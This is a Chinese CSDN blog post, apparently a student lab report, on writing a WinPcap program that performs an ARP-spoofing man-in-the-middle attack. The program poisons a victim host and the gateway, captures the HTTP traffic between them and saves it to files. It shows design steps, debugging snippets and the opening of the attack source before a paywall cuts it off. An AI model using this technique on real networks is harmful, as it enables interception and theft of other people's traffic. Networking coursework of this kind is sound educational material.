利用WinPcap编程,实现基于ARP欺骗的中间人攻击

最新推荐文章于 2023-05-07 15:06:57 发布
VIP文章 最新推荐文章于 2023-05-07 15:06:57 发布
阅读量8.4k 收藏 28
点赞数 5
分类专栏: 套接字 文章标签: winpcap 编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ni9htmar3/article/details/54612394
版权

*******此实验旨在交流学习,请勿用在非正常合法途径*******

利用WinPcap编程,实现基于ARP欺骗的中间人攻击

一、实验内容

  • 利用WinPcap,分别向被欺骗主机和网关发送APR请求包, 达到同时欺骗目标主机和网关的目的;
  • 所有目标主机和网关之间的数据都会被我们劫持,过滤 两者之间的所有http交互数据包,并保存为文件。 (http包的过滤可用80端口来标识)

二、设计思想

  • 理解ARP欺骗原理,将本机作为ARP欺骗的发起主机,即发起“中间人攻击”
  • 本机欺骗网关,网关向本局域网内其他主机发送的所有数据包时,本机将数据包的发送方MAC地址均改为本机的MAC地址。
  • 本机欺骗网内所有主机,其他主机向局域网网关发送的所有数据包时,本机将数据包的发送方MAC地址均改为本机的MAC地址。
  • 欺骗主机作为“中间人”,被欺骗主机的数据都经过它中转一次,这样欺骗主机可以窃取到被它欺骗的主机之间的通讯数据,并将其存储到相应文件之中,以便之后的详细分析。

三、实验要求

  提交源码(源码编写要规范)、可执行程序、实验报告(要有程序运行截图)。

四、实验分析

  1. 获取与网卡绑定的设备列表
  2. 要求用户选择用于捕获数据帧的设备
  3. 设置过滤规则
  4. 使用wpcap.dll实现ARP报文的发送功能
  5. 借助网络分析工具对ARP欺骗过程进行验证和分析
  6. 利用IP地址和IPV4的首部修改IP头,进行ARP欺骗

五、实验代码

  1. 一开始发现欺骗成功,但怎么写都没办法实现转发成功
    后来修改这相应参数值
if ((adhandle = pcap_open_live(d->name, // name of the device
        65536,         // portion of the packet to capture
        0,             // open flag
        1,          // read timeout
        errbuf         // error buffer
        )) == NULL)
    {
        fprintf(stderr, "\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
        pcap_freealldevs(alldevs);
        return -1;
    }

使得相应的能够转发成功
1. 又遇见新的问题,MAC值传递有问题

void transMac(char source[], u_char *dest)
{
    short i;
    int sourceLen = strlen(source);
    unsigned char highByte, lowByte;
    for (i = 0; i < sourceLen; i += 3)
    {
        highByte = toupper(source[i]);
        lowByte  = toupper(source[i + 1]);
        if(highByte > 0x39)
            highByte -= 0x37;
        else
            highByte -= 0x30;
        if(lowByte > 0x39)
            lowByte -= 0x37;
        else
            lowByte -= 0x30;
        dest[i/3] = (highByte << 4) | lowByte;
    }
}

char GateMac[100]=”“,FackMac[100]=”“;

通过固定MAC然后进入函数中去转化,用这个值传输,使得我最终能得到正确的MAC地址
1. 后来不知道为什么当我写入文件的时候打开网页弹窗直接崩掉,经查看分析,发现是由于我忘写文件打开与关闭,导致正常的文件写入出现问题

完整代码

// ARPSpoofing.cpp : 定义控制台应用程序的入口点。
//
#include <iostream>
#include <stdio.h>
#include <conio.h>
#include <pcap.h>
#include <packet32.h>
#include <WinSock2.h>
#include <ntddndis.h>
#include "ArpSpoofing.h"

using namespace std;

unsigned char *mac; //本机MAC地址
unsigned char *fakemac; //被欺骗主机MAC地址
unsigned char *gatewaymac ;//网关MAC地址
unsigned long FakeIp; //要伪装成的IP地址
unsigned char *packet; //ARP包
unsigned long netsize;
unsigned long net;
pcap_t *adhandle; //一个pcap实例

struct EthernetHeader
{
    u_char DestMAC[6];    //目的MAC地址 6字节
    u_char SourMAC[6];   //源MAC地址 6字节
    u_short EthType;         //上一层协议类型&#
最低0.47元/天 解锁文章
「已注销」
关注
  • 5
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
基于winpcap的mfc arp欺骗
11-04
相比于之前的arp欺骗程序 修正了程序堆栈溢出的问题,添加了winpcap开发库,自动获取往电脑设置的网关(只需修改适配器名称),并且可以在网卡列表选择指定网卡发送数据包
基于ARP欺骗的网络攻击程序源码
河北正定欢迎您-少占鱼
10-23 626
最近开始学WINPCAP,看了很多高手写的基于arp欺骗的抓包工具,尤其是电子科大的TOo2y师兄的《详谈调用winpcap驱动写arp多功能工具》,令我收益非浅。下面是我把这个思想改成arp攻击程序(可令目标主机断开网络连接)的一些测试。高手请略过,以免有班门弄斧之闲。 一般的arp spoof是向被欺骗主机发送ARP REPLY数据报,把其中的源IP地址置为被欺骗主机要发包去的主机地址,源MA
基于Winpcap编程实现抓包实验.doc
12-02
基于Winpcap编程实现抓包实验.doc
基于WinPcap的网络数据包捕获与分析(源码)
01-17
基于WinPcap的网络数据包捕获与分析源码C++源码,包括文档详细解释
Qt:Qt实现飞秋拦截助手—ARP攻击 完整项目代码
12-07
Qt:Qt实现飞秋拦截助手—ARP攻击 完整项目代码 https://blog.csdn.net/qq_29542611/article/details/84874367
WinPcap网络编程入门——0. 环境配置及系列介绍
木笔#的博客
01-26 1万+
本教程适用于网络编程开发人员入门,将从底层分析 WinPcap 的执行过程,结合一些实际用例来学习 WinPcap网络编程Pcap 技术是网络底层开发的重要工具之一,允许应用程序避开成熟的网络协议,直接处理网络数据包。
C++ winpcap网络抓包代码实现,以及抓包内容解析。
热门推荐
qq_34481573的博客
07-17 1万+
C++ winpcap网络抓包代码实现,以及抓包内容解析。 c++实现抓包代码 1.安装winpcap(windows packet capture)是windows平台下一个免费,公共的网络访问系统。开发winpcap这个项目的目的在于为win32应用程序提供访问网络底层的能力。它用于windows系统下的直接的网络编程Winpcap提供了一个强大的编程接口,它很容易地在各个操作系统之间进行移植。 百度网盘: 链接:https://pan.baidu.com/s/1ot7H3Vz_KBvdmYKjJqu
[网络编程技术]Winpcap学习二
cheriselin的专栏
04-26 3763
第五天 处理离线的存储文件( offline dump file )     Winpcap 提供了一些函数把网络通信保存到文件并且可以读取这些文件的内容。 dump 文件的格式跟 libpcap 是一样的。它以二进制形式保存了被捕获的数据包的数据并且其他网络工具(包括 WinDump , Ethereal , Snort )也以此为标准。 处理 dump 文件的程序结构跟前面的程序结
2023年全国职业院校技能大赛-信息安全管理与评估-赛题 10
最新发布
君逍遥o
05-07 2000
2023年全国职业院校技能大赛-信息安全管理与评估-赛题 10
mac地址扫描源码_ARP-基础-扫描-攻击-防范!
weixin_39704314的博客
11-27 210
协议介绍ARP(Address Resolution Protocol)地址解析协议,将已知IP地址转换为MAC地址,由RFC820定义 ARP协议在OSI模型中处于数据链路层,在TCP/IP模型中处于网络层 ARP协议与数据链路层关联网络层在Windows操作系统中可以在cmd中使用“arp -a”查看本地arp缓存表(120秒过期)Python资源共享群:6260171232步骤概述当主机A要...
基于WinpcapARP欺骗实现
06-01
Winpcap4.0基础上开发的ARP攻击代码,仅学习网络协议之用,否则后果自负. 如有问题可以联系[email protected] 或者 登陆博客http://blog.csdn.net/xiaoy233/留言
基于winpcap的抓包程序
11-26
简洁的MFC界面,实现对ARP数据包的解析
基于winpcap网络协议编程
03-30
里面包含了winpcap基础编程,是txt文件,需要用C语言编译
ARP攻击源码
10-15
ARP 攻击源码和 防御ARP 攻击源码和 防御ARP 攻击源码和 防御ARP 攻击源码和 防御ARP 攻击源码和 防御ARP 攻击源码和 防御ARP 攻击源码和 防御
ARP攻击程序源代码
10-01
一个ARP攻击的程序,使用时需要用到winpcap库。在vc++6.0下调试成功
ARP攻击源码,C#+SharpPcap
03-01
一个参考用力,我也参考参考,能借用的代码绝对不能自己写。
商业编程-源码-本代码利用winpcap实现了自定义ARP.zip
06-22
商业编程-源码-本代码利用winpcap实现了自定义ARP.zip
基于WinPcapARP欺骗实验
07-19
掌握 WinPcaP 的安装和配置; 掌握 ARP 协议工作原理和格式; 掌握 WinPcap 发包程序的编写; 掌握防范 ARP 地址欺骗的方法和措施; 了解常用抓包软件,Wireshark、Sniffer Pro 等网络包分析软件的使用。
利用winpcap解析arp
04-04
下面是利用WinPcap解析ARP的步骤: 1. 安装WinPcap库并配置环境变量。 2. 创建一个WinPcap捕获器,并设置过滤器以仅捕获ARP数据包。 ```c++ pcap_t* pcap_handle; char errbuf[PCAP_ERRBUF_SIZE]; struct bpf_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值